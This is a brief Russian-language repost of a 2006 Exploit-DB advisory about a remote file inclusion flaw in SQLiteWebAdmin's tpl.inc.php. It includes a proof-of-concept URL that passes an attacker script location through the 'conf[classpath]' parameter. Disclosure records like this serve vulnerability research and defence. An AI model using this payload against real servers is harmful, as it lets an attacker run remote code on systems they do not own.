- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2123
- Проверка EDB
-
- Пройдено
- Автор
- SIRDARCKCAT
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-4102
- Дата публикации
- 2006-08-07
Код:
SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin
SQLiteWebAdmin is a simple PHP program for administrating
a SQL DataBase.
It suffers of a Remote File Inclusion Vulnerability.
The bug is in the "tpl.inc.php" program in the "lib"
directory, and is exploited when passing the parameter
"conf[classpath]".
http://www.server.com/lib/tpl.inc.php?conf[classpath]=[URL-OF-SCRIPT]
Succesfull explotation, needs register_globals=on
Att.
SirDarckCat
elhacker.net
# milw0rm.com [2006-08-07]- Источник
- www.exploit-db.com
